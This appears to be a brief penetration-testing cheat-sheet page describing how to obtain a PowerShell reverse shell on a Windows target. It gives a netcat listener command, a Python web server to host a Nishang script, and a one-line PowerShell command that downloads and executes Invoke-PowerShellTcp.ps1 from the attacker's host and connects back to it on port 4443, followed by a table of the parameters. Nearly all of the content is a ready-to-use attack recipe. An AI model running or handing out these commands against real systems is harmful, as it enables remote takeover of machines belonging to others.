Skip to content

PowerShell

Source of win scripts

  • https://github.com/samratashok/nishang

Revers shell

On hacker machine

listener

nc -nvlp 4443

static web server

python3 -m http.server

On target machine

powershell iex (New-Object Net.WebClient).DownloadString('http://10.18.9.175:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.18.9.175 -Port 4443
Key Description
http://10.18.9.175:8000/ server that deliver script
-IPAddress 10.18.9.175 local/hacker machine
-Port 4443 local/hacker machine